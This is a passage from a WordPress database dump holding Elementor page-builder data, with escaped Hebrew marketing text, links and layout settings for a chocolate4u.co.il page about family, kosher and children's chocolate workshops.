\\u05d9\\u05e6\\u05d9\\u05e8\\u05d4 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d4, \\u05d5\\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7 \\u05e9\\u05db\\u05d5\\u05dc\\u05dd \\u05d9\\u05d4\\u05e0\\u05d5 \\u05de\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05db\\u05d6\\u05d5.\\u00a0<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05dc\\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05de\\u05d4\\u05e0\\u05d4<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05d1\\u05dc\\u05d5\\u05ea \\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05e2\\u05dd \\u05d4\\u05d9\\u05e7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d4\\u05dd. \\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05d1\\u05d4\\u05dd \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05d1\\u05dc \\u05dc\\u05d0 \\u05ea\\u05de\\u05d9\\u05d3 \\u05db\\u05dc \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05ea\\u05ea\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d2\\u05d9\\u05dc\\u05d0\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05d9\\u05d7\\u05e1\\u05d9\\u05ea \\u05d5\\u05d1\\u05e0\\u05d9 \\u05e0\\u05d5\\u05e2\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05d0 \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05e6\\u05d9\\u05d0\\u05d4 \\u05dc\\u05de\\u05e1\\u05e2\\u05d3\\u05d4, \\u05e1\\u05e8\\u05d8 \\u05d0\\u05d5 \\u05e6\\u05e4\\u05d9\\u05d4 \\u05d1\\u05ea\\u05d5\\u05db\\u05e0\\u05d9\\u05ea \\u05d8\\u05dc\\u05d5\\u05d9\\u05d6\\u05d9\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e2\\u05e0\\u05d9\\u05d9\\u05e0\\u05ea \\u05e2\\u05d1\\u05d5\\u05d3 \\u05db\\u05d5\\u05dc\\u05dd, \\u05d1\\u05d8\\u05d7 \\u05d5\\u05d1\\u05d8\\u05d7 \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05ea\\u05db\\u05e0\\u05e0\\u05d9\\u05dd \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e1\\u05e4\\u05d5\\u05e8\\u05d8\\u05d9\\u05d1\\u05d9\\u05ea \\u05db\\u05d6\\u05d5 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8\\u05ea, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05ea\\u05d6\\u05db\\u05d5 \\u05dc\\u05e4\\u05e8\\u05e6\\u05d5\\u05e4\\u05d9\\u05dd.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05dc\\u05d5\\u05e2 \\u05d1\\u05d5\\u05dc \\u05dc\\u05d8\\u05e2\\u05de\\u05dd \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05db\\u05d9 \\u05de\\u05d9 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd? \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05ea\\u05e6\\u05e8\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05db\\u05d9\\u05d9\\u05e4\\u05d9\\u05ea, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05db\\u05dc \\u05dc\\u05d9\\u05e6\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05de\\u05d4 \\u05e9\\u05e2\\u05d5\\u05ea \\u05e9\\u05dc \\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05de\\u05d4\\u05e0\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d5\\u05d2\\u05dd \\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05e2\\u05e0\\u05d2 \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd.<\\/span><br \\/><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\\\">\\u05dc\\u05d7\\u05e6\\u05d5 \\u05db\\u05d0\\u05df \\u05dc\\u05e2\\u05d5\\u05d3 \\u05de\\u05d9\\u05d3\\u05e2 \\u05e2\\u05dc \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea<\\/a><\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4, \\u05db\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05dc\\u05d3\\u05d0\\u05d5\\u05d2<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05dc\\u05e0\\u05d5, \\u05db\\u05d5\\u05dc\\u05dc \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05d5\\u05ea \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05e9\\u05e8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05de\\u05e6\\u05e8\\u05d9\\u05db\\u05d4 \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d2\\u05dc\\u05dd \\u05e9\\u05e2\\u05d1\\u05e8\\u05d5 \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e9\\u05dc \\u05e8\\u05d1\\u05e0\\u05d5\\u05ea, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05e9\\u05e8\\u05d9\\u05dd, \\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d1\\u05d4\\u05dd \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05de\\u05d7\\u05d5\\u05e5 \\u05dc\\u05e6\\u05e8\\u05db\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d5\\u05e9\\u05d0\\u05d9\\u05e0\\u05dd \\u05d1\\u05d0\\u05d5 \\u05d1\\u05de\\u05d2\\u05e2 \\u05e2\\u05dd \\u05d1\\u05e9\\u05e8, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e7\\u05de\\u05d7\\u05d9\\u05dd \\u05de\\u05e0\\u05d5\\u05e4\\u05d9\\u05dd. \\u05db\\u05dc \\u05d0\\u05d7\\u05ea \\u05de\\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05d0\\u05dc\\u05d5 \\u05d4\\u05d9\\u05e0\\u05df \\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05de\\u05ea\\u05e0\\u05d4\\u05dc\\u05d5\\u05ea \\u05d1\\u05d5\\u05e8\\u05e1\\u05d9\\u05d4 \\u05d7\\u05dc\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05e4\\u05e8\\u05d5\\u05d5\\u05d4, \\u05db\\u05da \\u05e9\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05d9\\u05dd \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e9\\u05db\\u05d5\\u05dc\\u05dc\\u05ea \\u05d2\\u05dd \\u05e9\\u05d5\\u05de\\u05e8\\u05d9 \\u05de\\u05e1\\u05d5\\u05e8\\u05ea, \\u05d4\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3, \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05dc\\u05dc\\u05d0 \\u05d7\\u05e9\\u05e9. \\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.<\\/span><\\/p><h3><span style=\\\"color: #000000;\\\">\\u05e2\\u05d5\\u05d3 \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05de\\u05ea\\u05d5\\u05e7\\u05d5\\u05ea<\\/span><\\/h3><ul><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/\\\">\\u05dc\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc\\u05e0\\u05d5<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/propsal-at-chocolate-workshop\\/\\\">\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-employees\\/\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/valentine-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/kosher-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/birthday-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/span><\\/li><li><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/https:\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea<\\/a><\\/span><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bf3a8b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"a859d54\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7311588\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e995b06\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"8729d83\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"831a01d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(556,127,'_wp_page_template','elementor_canvas'),(557,127,'_elementor_edit_mode','builder'),(558,127,'_elementor_data','[{\"id\":\"73f3a63e\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"63f1f80\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5713db43\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57068ba8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"596a5a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"26fa35fd\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 